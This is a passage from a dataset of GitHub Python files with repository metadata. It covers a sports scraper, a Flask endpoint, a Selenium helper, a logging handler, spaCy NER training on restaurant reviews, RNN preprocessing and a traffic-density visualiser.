sleep=3)\n season_boxscores_hrefs = tqdm(season_boxscores_hrefs,position=1, leave=False)\n for j,season_boxscores_href in enumerate(season_boxscores_hrefs):\n if (i == i_chkpt) and (j < j_chkpt): \n continue\n 
season_boxscores_hrefs.set_description(season_boxscores_href)\n # fetch match box scores\n match_boxscores = fetch_match_boxscores(season_boxscores_href,save_to=LOCAL_HOST,from_local=False, content_only = True,sleep=4)\n save((i,j),checkpoint_path,mode='wb',file_type='.pkl')\n \n\n# source /Users/jasetran/Jase/UM/Git/basketball-analytics/.venv/bin/activate\n# /Users/jasetran/Jase/UM/Git/basketball-analytics/.venv/bin/python /Users/jasetran/Jase/UM/Git/basketball-analytics/code/v5/scripts/scrape.py\n","repo_name":"tranndt/basketball-analytics","sub_path":"code/v5/scripts/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":7235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42131163301","text":"from flask import Flask, request\nimport json\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n heim = request.args.get('heim')\n gast = request.args.get('gast')\n\n res=[heim, gast]\n res_a = {\"a\": res, \"b\": res}\n return json.dumps(res_a)","repo_name":"tipsky-club/tipsky","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29510869654","text":"from __future__ import annotations\n\nfrom logging import Logger\nfrom time import sleep\n\nimport pyperclip\nfrom selenium.common import TimeoutException\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\nclass Element(object):\n \"\"\"\n 页面元素类\n\n 元素定位默认使用`xpath`, 显示等待超时时间默认 5s\n \"\"\"\n\n def __init__(self, driver: WebDriver, log: Logger, sleep_debug: float = 0) -> None:\n \"\"\"\n 初始化方法\n\n :param driver: 浏览器驱动对象\n :param log: 日志对象\n :param sleep_debug: 全局的调试时间, 默认0s\n \"\"\"\n self.driver = driver\n self.log = log\n self.sleep_debug = sleep_debug\n\n def get_url(self, url: str) -> None:\n \"\"\"\n 跳转到指定的`url`\n\n :param url: url路径\n :return:\n \"\"\"\n try:\n self.driver.get(url)\n except TimeoutException:\n msg = \"加载页面超时! 页面url: \" + url\n self.log.error(msg)\n raise TimeoutException(msg)\n\n def find_ele_visible(self, value: str, by: str = By.XPATH, timeout: float = 5) -> WebElement:\n \"\"\"\n 定位可见元素\n\n 增加显示等待定位元素, 也可以理解为: 等待元素可见. 
状态变化: 元素从不可见到可见\n\n :param value: 定位字符串\n :param by: 定位方式, 默认使用`xpath`\n :param timeout: 显示等待的超时时间, 默认 5s\n :return: 在指定的时间内, 找到可见元素返回元素对象, 否者报超时错误\n \"\"\"\n try:\n ele: WebElement = WebDriverWait(self.driver, timeout=timeout).until(\n expected_conditions.visibility_of_element_located((by, value)))\n except TimeoutException:\n msg = \"未定位到可见元素 --> %s:%s\" % (by, value)\n self.log.error(msg)\n raise TimeoutException(msg)\n return ele\n\n def wait_ele_invisible(self, value: str, by: str = By.XPATH, timeout: float = 5) -> bool:\n \"\"\"\n 等待元素不可见\n\n 状态变化: 元素从可见到不可见\n\n :param value: 定位字符串\n :param by: 定位方式, 默认使用`xpath`\n :param timeout: 显示等待的超时时间, 默认 5s\n :return: 在指定的时间内, 元素从可见变成不可见返回 True, 否者报超时错误\n \"\"\"\n try:\n WebDriverWait(self.driver, timeout=timeout).until_not(\n expected_conditions.visibility_of_element_located((by, value)))\n except TimeoutException:\n msg = \"元素未消失 --> %s:%s\" % (by, value)\n self.log.error(msg)\n raise TimeoutException(msg)\n return True\n\n def click_ele(self, value: str, by: str = By.XPATH, timeout: float = 5) -> None:\n \"\"\"\n 点击可见元素\n\n :param value: 定位字符串\n :param by: 定位方式, 默认使用`xpath`\n :param timeout: 显示等待的超时时间, 默认 5s\n :return:\n \"\"\"\n ele = self.find_ele_visible(value=value, by=by, timeout=timeout)\n text = ele.text\n ele.click()\n self.ele_log(action=\"点击了元素\", text=text, by=by, value=value)\n sleep(self.sleep_debug)\n\n def jsclick_ele(self, value: str, by: str = By.XPATH, timeout: float = 5) -> None:\n \"\"\"\n js点击可见元素, 通常用于元素上有其他元素遮挡, 比如有弹窗消息之类的元素\n \"\"\"\n ele = self.find_ele_visible(value=value, by=by, timeout=timeout)\n text = ele.text\n self.driver.execute_script(\"arguments[0].click();\", ele)\n self.ele_log(action=\"js点击了元素\", text=text, by=by, value=value)\n sleep(self.sleep_debug)\n\n def input_text(self, value: str, text: str, by: str = By.XPATH, timeout: float = 5) -> None:\n \"\"\"\n 先清空输入框, 再输入数据\n \"\"\"\n ele = self.find_ele_visible(value=value, by=by, timeout=timeout)\n ele.clear()\n ele.send_keys(text)\n self.ele_log(action=\"输入了文本\", text=text, by=by, value=value)\n\n def get_paste(self) -> str:\n \"\"\"获取复制的内容\"\"\"\n return pyperclip.paste()\n\n def slide_scrollbar(self, x: int, y: int) -> None:\n \"\"\"\n 滑动滚动条\n x: 正整数--向左, 负整数--向右\n y: 正整数--向上, 负整数--向下\n \"\"\"\n self.driver.execute_script(\"window.scrollTo(\" + str(x) + \", \" + str(y) + \")\")\n\n def ele_log(self, action: str, by: str, value: str, text: str) -> None:\n \"\"\"\n 元素操作日志\n \"\"\"\n self.log.info(\"成功%s: %s --> %s:%s\", action, text, by, value)\n","repo_name":"huohuoren4/python-demo","sub_path":"auto-test/core/webui/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17708962655","text":"import pandas as pd\r\n\r\ndef tostr(value):\r\n return str(value)\r\n\r\n\r\nintel_data = pd.read_csv('cpus_data/intel_data.csv')\r\nmediatek_data = pd.read_csv('cpus_data/mediatek_data.csv')\r\namd_data = pd.read_csv('cpus_data/amd_data.csv')\r\ndata = pd.read_csv('data.csv')\r\n\r\nframes = [intel_data, mediatek_data, amd_data]\r\nfeatures = pd.concat(frames)\r\nfeatures[\"Name\"] = features[\"Name\"].apply(tostr)\r\n\r\nunique_names = data.CPU.unique()\r\n\r\nfound = []\r\nfound_cpus = pd.DataFrame()\r\n\r\nfor name in unique_names:\r\n if name == \" \":\r\n continue\r\n for cpu in features['Name']:\r\n if name.lower() in cpu.lower():\r\n found.append(features[features['Name'] == cpu])\r\n\r\nnew_df = pd.concat(found)\r\nnew_df = 
new_df[[\"Name\",\"Cores\",\"Threads\",\"Base\",\"Turbo\"]]\r\n\r\nnew_df.to_csv(\"processor_data.csv\")","repo_name":"NAndrej/laptop-price-prediction","sub_path":"CPUs/fetch_cpu.py","file_name":"fetch_cpu.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1039078338","text":"import os\nimport re\nimport textwrap as tw\ndef filters(s):\n # Interview comments\n if s.startswith(\"TIME\") or s.startswith(\"INTERVIEW\"):\n return False\n # Interview comments\n if s.startswith(\"NB\"):\n return False\n # Short utterances can only be interruptions\n if len(s.split()) <= 2:\n return False\n # Empty utterances\n if re.findall(r'^\\s*$', s):\n return False\n if not s:\n return False\n return True\n\ndef parse(s):\n start = False\n speaker = False\n s = re.sub(r'\\[anon\\]', '**anon**', s)\n s = re.sub(r'\\(([^()]+)\\)|\\[([^\\[\\]]+)\\]', '', s)\n attempt = re.findall(r'(^[A-Z]+):(.*)', s)\n if attempt:\n speaker, s = attempt[0][0], attempt[0][1]\n # s = s[2:] if s[1] == ':' else s[3:]\n start = True\n s = re.sub(r'\\s{2,}', ' ', s)\n return s.strip(), start, speaker\n\nrel_path = re.sub(r'[^/]+$', '', os.getcwd())\nconv_path = os.path.join(rel_path, 'data/convData')\ntrain_path = os.path.join(rel_path, 'data/trainData')\nif not os.path.isdir(train_path):\n os.mkdir(train_path)\nfor process_file in os.listdir(conv_path):\n f = open(os.path.join(conv_path, process_file))\n # dest_file_path = \"conv\" + str(i)\n line = f.readline()\n dump = ''\n speakers = []\n utterance_dict = {}\n while(line == '\\n'):\n line = f.readline()\n while(line != '\\n'):\n speakers += [re.findall(r'[A-Z]+:', line)[0][:-1]]\n line = f.readline()\n while(line):\n s, start, speaker = parse(line)\n if filters(s):\n if(speaker):\n current_speaker = speaker\n \"\"\"\n between two sentences: put EOS tag if last character is a letter. Leave this otherwise.\n \"\"\"\n if current_speaker not in utterance_dict:\n utterance_dict[current_speaker] = s\n else:\n if start:\n # If starting now, then previous has finished; finish previous sentence\n # If prev had a punctuation mark at the end, leave it there. 
Else, mark EOS\n if utterance_dict[current_speaker].strip()[-1:] not in '-,.?!':\n utterance_dict[current_speaker] += ' EOS '\n else:\n utterance_dict[current_speaker] += ' '\n # Append new utterance to dataset\n utterance_dict[current_speaker] = utterance_dict[current_speaker] + s\n else:\n utterance_dict[current_speaker] = utterance_dict[current_speaker] + ' ' + s\n line = f.readline()\n for speaker in speakers:\n if speaker in utterance_dict:\n wrapped = '\\n'.join(tw.wrap(utterance_dict[speaker]))\n dest_file_path = \"conv_\" + '_'.join(speakers) + '@Speaker_' + speaker\n write_text_file = open(os.path.join(train_path, dest_file_path), \"w\")\n write_text_file.write(wrapped)\n write_text_file.close()\n","repo_name":"st-vincent1/fishWaffle","sub_path":"src/convBySpeakerParser.py","file_name":"convBySpeakerParser.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27145348149","text":"import linecache\nfrom threading import Thread\nimport sys\nfrom logging import Handler, Formatter\nfrom logging import CRITICAL, ERROR, WARNING, INFO, DEBUG, NOTSET\nimport time\n\ntry:\n from Queue import Queue\nexcept:\n from queue import Queue\nimport requests\nimport json\n\n_levelToName = {\n CRITICAL: 'FATAL',\n ERROR: 'ERROR',\n WARNING: 'WARN',\n INFO: 'INFO',\n DEBUG: 'DEBUG',\n NOTSET: 'TRACE',\n}\n\n\nclass LoggerJsonFormatter(Formatter):\n \"\"\"\n Format record in LoggerJson format\n \"\"\"\n\n def format(self, record):\n \"\"\"Formats LogRecord into python dictionary.\"\"\"\n # Standard document\n document = {\n 'timestamp': time.time() * 1000.0,\n 'level': _levelToName[record.levelno],\n 'thread': record.threadName,\n 'thread_id': record.thread,\n 'message': record.getMessage(),\n 'logger': record.name,\n 'location': {\n 'filename': record.pathname,\n 'class': record.module,\n 'method': record.funcName,\n 'line': record.lineno\n }\n }\n # Standard document decorated with exception info\n if record.exc_info is not None:\n document.update({\n 'throwable': {\n 'message': str(record.exc_info[1]),\n 'stack_trace': [\n {\n \"line\": stack[1],\n \"filename\": stack[0],\n \"method\": stack[2],\n \"line_code\": stack[3]\n }\n for stack in LoggerJsonFormatter.extract_tb(record.exc_info[2])\n ]\n }\n })\n return document\n\n @staticmethod\n def extract_tb(tb, limit=None):\n \"\"\"Return list of up to limit pre-processed entries from traceback.\n\n This is useful for alternate formatting of stack traces. If\n 'limit' is omitted or None, all entries are extracted. A\n pre-processed stack trace entry is a quadruple (filename, line\n number, function name, text) representing the information that is\n usually printed for a stack trace. 
The text is a string with\n leading and trailing whitespace stripped; if the source is not\n available it is None.\n \"\"\"\n if limit is None:\n if hasattr(sys, 'tracebacklimit'):\n limit = sys.tracebacklimit\n list = []\n n = 0\n while tb is not None and (limit is None or n < limit):\n f = tb.tb_frame\n lineno = tb.tb_lineno\n co = f.f_code\n filename = co.co_filename\n name = co.co_name\n linecache.checkcache(filename)\n line = linecache.getline(filename, lineno, f.f_globals)\n if line:\n line = line.strip()\n else:\n line = None\n list.append((filename, lineno, name, line))\n tb = tb.tb_next\n n = n + 1\n return list\n\n\nclass LofkaHandler(Handler):\n \"\"\"\n Log handler which sending\n \"\"\"\n\n def __init__(self, target_url, app_name=\"default_python_application\"):\n super(LofkaHandler, self).__init__()\n try:\n with open(\"lofka.json\", \"r\") as fp:\n obj = json.load(fp)\n target_url = obj['target_url']\n app_name = obj['app_name']\n except:\n pass\n self.target_url = target_url + \"lofka/service/push\"\n self.app_name = app_name\n self.formatter = LoggerJsonFormatter()\n\n def emit(self, record):\n \"\"\"\n Commit record to server\n :param record:\n :return:\n \"\"\"\n record_object = self.formatter.format(record)\n record_object[\"app_name\"] = self.app_name\n requests.post(self.target_url, data=json.dumps(record_object))\n\n\nclass LofkaAsyncHandler(Handler):\n \"\"\"\n Log handler which sending\n \"\"\"\n\n def __init__(self,\n target_url,\n app_name=\"default_python_application\",\n interval=1000,\n max_buffer_size=1000\n ):\n super(LofkaAsyncHandler, self).__init__()\n try:\n with open(\"lofka.json\", \"r\") as fp:\n obj = json.load(fp)\n target_url = obj['target_url']\n app_name = obj['app_name']\n interval = int(obj['interval'])\n max_buffer_size = int(obj['max_buffer_size'])\n except:\n pass\n self.target_url = target_url + \"lofka/service/push/batch\"\n self.app_name = app_name\n self.formatter = LoggerJsonFormatter()\n self.message_queue = Queue(int(max_buffer_size * 1.3)) # type: Queue\n self.max_buffer_size = max_buffer_size\n\n def push_data_periodically():\n while True:\n if self.message_queue.qsize() > 0:\n self.__submit_batch(list(self.message_queue.queue))\n self.message_queue.queue.clear()\n else:\n time.sleep(interval / 1000.0)\n\n Thread(target=push_data_periodically).start()\n\n def __submit_batch(self, data):\n \"\"\"\n Submit messages\n :type data: list\n :param data: messages\n :return:\n \"\"\"\n requests.post(self.target_url, data=json.dumps(data))\n\n def emit(self, record):\n \"\"\"\n Commit record to server\n :param record:\n :return:\n \"\"\"\n record_object = self.formatter.format(record)\n record_object[\"app_name\"] = self.app_name\n self.message_queue.put(record_object, timeout=1)\n if self.message_queue.qsize() > self.max_buffer_size:\n self.__submit_batch(list(self.message_queue.queue))\n self.message_queue.queue.clear()\n","repo_name":"TsingJyujing/lofka","sub_path":"lofka-python-utils/lofka/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"53"} +{"seq_id":"39477914082","text":"#!/usr/bin/env python\n# coding: utf8\n\"\"\"Example of training an additional entity type\nThis script shows how to add a new entity type to an existing pre-trained NER\nmodel. To keep the example short and simple, only four sentences are provided\nas examples. In practice, you'll need many more — a few hundred would be a\ngood start. 
You will also likely need to mix in examples of other entity\ntypes, which might be obtained by running the entity recognizer over unlabelled\nsentences, and adding their annotations to the training set.\nThe actual training is performed by looping over the examples, and calling\n`nlp.entity.update()`. The `update()` method steps through the words of the\ninput. At each word, it makes a prediction. It then consults the annotations\nprovided on the GoldParse instance, to see whether it was right. If it was\nwrong, it adjusts its weights so that the correct action will score higher\nnext time.\nAfter training your model, you can save it to a directory. We recommend\nwrapping models as Python packages, for ease of deployment.\nFor more details, see the documentation:\n* Training: https://spacy.io/usage/training\n* NER: https://spacy.io/usage/linguistic-features#named-entities\nCompatible with: spaCy v2.0.0+\n\"\"\"\nfrom __future__ import unicode_literals, print_function\n\nimport plac\nimport random\nfrom pathlib import Path\nimport spacy\n\n\n# new entity label\nLABEL = 'TASTE'\n\n# training data\n# Note: If you're using an existing model, make sure to mix in examples of\n# other entity types that spaCy correctly recognized before. Otherwise, your\n# model might learn the new type, but \"forget\" what it previously knew.\n# https://explosion.ai/blog/pseudo-rehearsal-catastrophic-forgetting\nTRAIN_DATA = [\n\n( u\"To be completely fair, the only redeeming factor was the food, which was above average, but couldn't make up for all the other deficiencies of Teodora.\" ,{'entities':[(73,89, u'TASTE' )]}),\n\n( u\"The food is uniformly exceptional, with a very capable kitchen which will proudly whip up whatever you feel like eating, whether it's on the menu or not.\" ,{'entities':[(12,33, u'TASTE' )]}),\n\n( u\"Not only was the food outstanding, but the little 'perks' were great.\" ,{'entities':[(22,33, u'TASTE' )]}),\n\n( u\"Not only was the food outstanding, but the little 'perks' were great.\" ,{'entities':[(63,68, u'TASTE' )]}),\n\n( u\"It is very overpriced and not very tasty.\" ,{'entities':[(26,40, u'TASTE' )]}),\n\n( u\"Our agreed favorite is the orrechiete with sausage and chicken (usually the waiters are kind enough to split the dish in half so you get to sample both meats).\" ,{'entities':[(11,19, u'TASTE' )]}),\n\n( u\"The Bagels have an outstanding taste with a terrific texture, both chewy yet not gummy.\" ,{'entities':[(19,30, u'TASTE' )]}),\n\n( u\"Nevertheless the food itself is pretty good.\" ,{'entities':[(32,43, u'TASTE' )]}),\n\n( u\"They did not have mayonnaise, forgot our toast, left out ingredients (ie cheese in an omelet), below hot temperatures and the bacon was so over cooked it crumbled on the plate when you touched it.\" ,{'entities':[(30,36, u'TASTE' )]}),\n\n( u\"The pizza is the best if you like thin crusted pizza.\" ,{'entities':[(17,21, u'TASTE' )]}),\n\n( u\"We were very disappointed.\" ,{'entities':[(13,25, u'TASTE' )]}),\n\n( u\"IT IS DEFINITELY SPECIAL AND AFFORDABLE.\" ,{'entities':[(17,24, u'TASTE' )]}),\n\n( u\"From the incredible food, to the warm atmosphere, to the friendly service, this downtown neighborhood spot doesn't miss a beat.\" ,{'entities':[(9,19, u'TASTE' )]}),\n\n( u\"Great food at REASONABLE prices, makes for an evening that can't be beat!\" ,{'entities':[(0,5, u'TASTE' )]}),\n\n( u\"The fried rice is amazing here.\" ,{'entities':[(18,25, u'TASTE' )]}),\n\n( u\"Three courses - choices include excellent mussels, puff pastry goat cheese and 
salad with a delicious dressing, and a hanger steak au poivre that is out of this world.\" ,{'entities':[(32,41, u'TASTE' ),(92,101, u'TASTE' )]}),\n\n( u\"it's a perfect place to have a amazing indian food.\" ,{'entities':[(12,33, u'TASTE' )]}),\n\n( u\"At the end you're left with a mild broth with noodles that you can slurp out of a cup.\" ,{'entities':[(30,34, u'TASTE' )]}),\n( u\"I just wonder how you can have such a delicious meal for such little money.\" ,{'entities':[(38,47, u'TASTE' )]}),\n\n( u\"The food was delicious but do not come here on a empty stomach.\" ,{'entities':[(13,22, u'TASTE' )]}),\n\n( u\"Ive been to many Thai restaurants in Manhattan before, and Toons is by far the best Thai food Ive had (except for my mom's of course).\" ,{'entities':[(79,83, u'TASTE' )]}),\n\n( u\"Nice atmosphere, the service was very pleasant and the desert was good.\" ,{'entities':[(66,70, u'TASTE' )]}),\n\n( u\"Fabulous service, fantastic food, and a chilled out atmosphere and environment.\" ,{'entities':[(18,27, u'TASTE' )]}),\n\n( u\"Great food, good size menu, great service and an unpretensious setting.\" ,{'entities':[(0,5, u'TASTE' )]}),\n\n( u\"The menu is limited but almost all of the dishes are excellent.\" ,{'entities':[(53,62, u'TASTE' )]}),\n\n( u\"Unfortunately, the food is outstanding, but everything else about this restaurant is the pits.\" ,{'entities':[(27,38, u'TASTE' )]}),\n\n( u\"We always have a delicious meal and always leave feeling satisfied.\" ,{'entities':[(17,26, u'TASTE' )]}),\n\n( u\"The pizza was pretty good and huge.\" ,{'entities':[(14,25, u'TASTE' )]}),\n\n( u\"The atmosphere is unheralded, the service impecible, and the food magnificent.\" ,{'entities':[(66,77, u'TASTE' )]}),\n\n( u\"The wait staff is friendly, and the food has gotten better and better!\" ,{'entities':[(52,58, u'TASTE' )]}),\n\n( u\"It may be a bit packed on weekends, but the vibe is good and it is the best French food you will find in the area.\" ,{'entities':[(71,75, u'TASTE' )]}),\n\n( u\"Right off the L in Brooklyn this is a nice cozy place with good pizza.\" ,{'entities':[(59,63, u'TASTE' )]}),\n\n( u\"We had the lobster sandwich and it was FANTASTIC.\" ,{'entities':[(39,48, u'TASTE' )]}),\n\n( u\"Deep Fried Skewers are good and still rare to find in NYC.\" ,{'entities':[(23,27, u'TASTE' )]}),\n\n( u\"Their tuna tartar appetizer is to die for.\" ,{'entities':[(34,41, u'TASTE' )]}),\n\n( u\"An oasis of refinement: Food, though somewhat uneven, often reaches the pinnacles of new American fine cuisine - chef's passion (and kitchen's precise execution) is most evident in the fish dishes and soups.\" ,{'entities':[(47,53, u'TASTE' )]}),\n\n]\n\n\n@plac.annotations(\n model=(\"Model name. 
Defaults to blank 'en' model.\", \"option\", \"m\", str),\n new_model_name=(\"New model name for model meta.\", \"option\", \"nm\", str),\n output_dir=(\"Optional output directory\", \"option\", \"o\", Path),\n n_iter=(\"Number of training iterations\", \"option\", \"n\", int))\ndef main(model=None, new_model_name='animal', output_dir=None, n_iter=20):\n \"\"\"Set up the pipeline and entity recognizer, and train the new entity.\"\"\"\n nlp = spacy.load('en') # load the pre-trained English model\n print(\"Loaded pre-trained 'en' model\")\n # Add entity recognizer to model if it's not in the pipeline\n # nlp.create_pipe works for built-ins that are registered with spaCy\n if 'ner' not in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner)\n # otherwise, get it, so we can add labels to it\n else:\n ner = nlp.get_pipe('ner')\n\n ner.add_label(LABEL) # add new entity label to entity recognizer\n if model is None:\n optimizer = nlp.begin_training()\n else:\n # Note that 'begin_training' initializes the models, so it'll zero out\n # existing entity types.\n optimizer = nlp.entity.create_optimizer()\n\n\n\n # get names of other pipes to disable them during training\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner']\n with nlp.disable_pipes(*other_pipes): # only train NER\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n losses = {}\n for text, annotations in TRAIN_DATA:\n nlp.update([text], [annotations], sgd=optimizer, drop=0.35,\n losses=losses)\n print(losses)\n\n # test the trained model\n test_text = 'The food always tastes fresh and served promptly.'\n doc = nlp(test_text)\n print(\"Entities in '%s'\" % test_text)\n for ent in doc.ents:\n print(ent.label_, ent.text)\n\n # save model to output directory\n if output_dir is None:\n output_dir = Path('/home/tanush/Desktop/NER Project/Taste Extractor/en_rev_taste')\n if not output_dir.exists():\n output_dir.mkdir()\n nlp.meta['name'] = new_model_name # rename model\n nlp.to_disk(output_dir)\n print(\"Saved model to\", output_dir)\n\n # test the saved model\n print(\"Loading from\", output_dir)\n nlp2 = spacy.load(output_dir)\n doc2 = nlp2(test_text)\n for ent in doc2.ents:\n print(ent.label_, ent.text)\n\n\nif __name__ == '__main__':\n plac.call(main)\n","repo_name":"aijedi/taste_extract","sub_path":"train_new_entity_type.py","file_name":"train_new_entity_type.py","file_ext":"py","file_size_in_byte":8914,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"169786053","text":"import numpy as np\nimport pickle\nimport csv\nimport itertools\nimport nltk\n\n\n\ndef preprocess(vocabulary_size, use_existing, unknown_token, sentence_start_token, sentence_end_token):\n if use_existing:\n with open('training_data.pickle', 'rb') as f:\n X_train, Y_train, index_to_word, word_to_index = pickle.load(f)\n else:\n unknown_token = \"UNKNOWN_TOKEN\"\n sentence_start_token = \"SENTENCE_START\"\n sentence_end_token = \"SENTENCE_END\"\n\n\n #Reading CSV file in\n print(\"Reading CSV file\")\n\n with open('data/reddit_text.csv', 'rb') as f:\n reader = csv.reader(f, skipinitialspace=True)\n reader.next()\n #split full comments into sentences\n sentences = itertools.chain(*[nltk.sent_tokenize(x[0].decode('utf-8').lower()) for x in reader])\n #append SENTENCE_START and SENTENCE_END\n sentences = [\"%s %s %s\" % (sentence_start_token, x, sentence_end_token) for x in sentences]\n print(\"Parsed %d sentences\" % (len(sentences)))\n\n #Tokenize Sentences into words\n tokenized_sentences = 
[nltk.word_tokenize(sentence) for sentence in sentences]\n\n #Count the word frequencies\n word_freq = nltk.FreqDist(itertools.chain(*tokenized_sentences))\n print(\"Found %d unique word tokens.\" % len(word_freq.items()))\n\n #Build both index_to_word and word_to_index vectors for the most common words\n vocab = word_freq.most_common(vocabulary_size-1)\n index_to_word = [x[0] for x in vocab]\n index_to_word.append(unknown_token)\n word_to_index = dict([(w, i) for i, w in enumerate(index_to_word)])\n\n print(\"Using vocabulary of size %d\" % vocabulary_size)\n print(\"The least frequent word in our vocabulary is '%s' and appeared %d times.\" % (vocab[-1][0], vocab[-1][1]))\n\n #Replace all words not in our vocabulary with unknown_token\n for i, sentence in enumerate(tokenized_sentences):\n tokenized_sentences[i] = [w if w in word_to_index else unknown_token for w in sentence]\n\n print(\"\\nExample sentence before preprocessing: '%s'\" % sentences[0])\n print(\"\\nExample sentence after preprocessing: '%s'\" % tokenized_sentences[0])\n\n #Create training data\n X_train = np.asarray([[word_to_index[w] for w in sentence[:-1]] for sentence in tokenized_sentences])\n Y_train = np.asarray([[word_to_index[w] for w in sentence[1:]] for sentence in tokenized_sentences]) \n with open('training_data.pickle', 'wb') as f:\n pickle.dump([X_train, Y_train, index_to_word, word_to_index], f)\n\n return X_train, Y_train, index_to_word, word_to_index\n\n\n\n\ndef softmax(x):\n xt = np.exp(x - np.max(x))\n return xt / np.sum(xt)\n\n\n\n\n","repo_name":"kenk42292/RNN","sub_path":"data/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"18992084580","text":"import cv2\nimport numpy as np\nimport matplotlib.path as mplPath\nimport glob\nimport os\nimport time\n\nfrom detection import Detector\n\nclass Intensity_Road:\n def __init__(self) -> None:\n self.DC = Detector()\n self.frame=0\n self.a1 = [[330,362],[424,219],[440,161],[466,157],[472,233],[418,370]] ####Coordinates provided by images\n self.a2 = [[3,751],[324,371],[414,375],[86,958]]\n self.b1 = [[479,382],[482,151],[513,153],[548,294],[553,294],[552,388]]\n self.b2 = [[300,965],[478,385],[554,387],[530,950]]\n self.c1 = [[597,384],[558,222],[524,148],[554,148],[645,290],[685,384]]\n self.c2 = [[630,953],[594,388],[684,387],[883,951]]\n self.d1 = [[746,375],[637,220],[569,153],[592,156],[697,242],[816,376]]\n self.d2 = [[1060,955],[749,380],[819,378],[1272,903],[1278,950]]\n\n self.a1_path = mplPath.Path(np.array(self.a1))\n self.b1_path = mplPath.Path(np.array(self.b1))\n self.c1_path = mplPath.Path(np.array(self.c1))\n self.d1_path = mplPath.Path(np.array(self.d1))\n self.a2_path = mplPath.Path(np.array(self.a2))\n self.b2_path = mplPath.Path(np.array(self.b2))\n self.c2_path = mplPath.Path(np.array(self.c2))\n self.d2_path = mplPath.Path(np.array(self.d2))\n\n self.a1cnt=0\n self.b1cnt=0\n self.c1cnt=0\n self.d1cnt=0\n self.a2cnt=0\n self.b2cnt=0\n self.c2cnt=0\n self.d2cnt=0\n\n self.colors =[(0,255,0),(255, 0, 0),(0,0,255)]\n\n def gui(self):\n for fname in sorted(glob.glob(\"enter_image_dir/*.jpg\"), key=os.path.getmtime): \n time.sleep(0.01)\n image_rgb = cv2.imread(fname)\n image_rgb=cv2.resize(image_rgb,(1280,960),interpolation=cv2.INTER_AREA)\n self.h, self.w,_= image_rgb.shape\n detected_img, self.detections, self.blackimg = self.DC.main_intensity(image_rgb)\n\n if self.frame%30==0:\n 
intensity_level=self.intensity()\n\n mask=self.mask_img(detected_img, intensity_level)\n \n mask=cv2.resize(mask,(2592,1520),interpolation=cv2.INTER_AREA)\n mask = cv2.rectangle(mask, (1200,60), (1730, 0), (255,255,255), -1)\n cv2.putText(mask, 'Traffic Density', (1200,50), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,0,0), 2, cv2.LINE_AA)\n cv2.imshow(\"Inference\", mask)\n if cv2.waitKey(10) & 0xFF == ord(\"q\"):\n break\n self.frame+=1\n\n def mask_img(self, image, intensity_level):\n h, w, d = image.shape\n mask = np.zeros([h,w],dtype=np.uint8)\n\n a1 = np.array(self.a1, np.int32)\n b1 = np.array(self.b1, np.int32)\n c1 = np.array(self.c1, np.int32)\n d1 = np.array(self.d1, np.int32)\n a2 = np.array(self.a2, np.int32)\n b2 = np.array(self.b2, np.int32)\n c2 = np.array(self.c2, np.int32)\n d2 = np.array(self.d2, np.int32)\n\n mask = np.dstack((mask, mask, mask))\n\n cv2.fillPoly(mask, [a1], self.colors[int(intensity_level[0])])\n cv2.fillPoly(mask, [b1], self.colors[int(intensity_level[1])])\n cv2.fillPoly(mask, [c1], self.colors[int(intensity_level[2])])\n cv2.fillPoly(mask, [d1], self.colors[int(intensity_level[3])])\n cv2.fillPoly(mask, [a2], self.colors[int(intensity_level[4])])\n cv2.fillPoly(mask, [b2], self.colors[int(intensity_level[5])])\n cv2.fillPoly(mask, [c2], self.colors[int(intensity_level[6])])\n cv2.fillPoly(mask, [d2], self.colors[int(intensity_level[7])])\n\n mask2 = cv2.bitwise_or(image, mask)\n # mask = cv2.bitwise_or(self.blackimg, mask)\n # mask = self.transform(mask)\n # #mask[0:100,0:1280]=0\n # cv2.imshow(\"maske\", mask)\n # cv2.waitKey(10)\n return mask2\n \n def count_vehicle(self):\n intensity_list=[]\n self.a1cnt=0\n self.b1cnt=0\n self.c1cnt=0\n self.d1cnt=0\n self.a2cnt=0\n self.b2cnt=0\n self.c2cnt=0\n self.d2cnt=0\n for i,pred in enumerate(self.detections):\n x,y = self.bbox(pred)\n point=(int(x),int(y))\n\n if self.a1_path.contains_point(point):\n self.a1cnt+=1\n elif self.b1_path.contains_point(point):\n self.b1cnt+=1\n elif self.c1_path.contains_point(point):\n self.c1cnt+=1\n elif self.d1_path.contains_point(point):\n self.d1cnt+=1\n elif self.a2_path.contains_point(point):\n self.a2cnt+=1\n elif self.b2_path.contains_point(point):\n self.b2cnt+=1\n elif self.c2_path.contains_point(point):\n self.c2cnt+=1\n elif self.d2_path.contains_point(point):\n self.d2cnt+=1\n else:\n pass\n #print(\"No vehicle detected on the roads\")\n\n intensity_list= [self.a1cnt, self.b1cnt, self.c1cnt, self.d1cnt, self.a2cnt, self.b2cnt, self.c2cnt, self.d2cnt]\n return intensity_list\n\n def 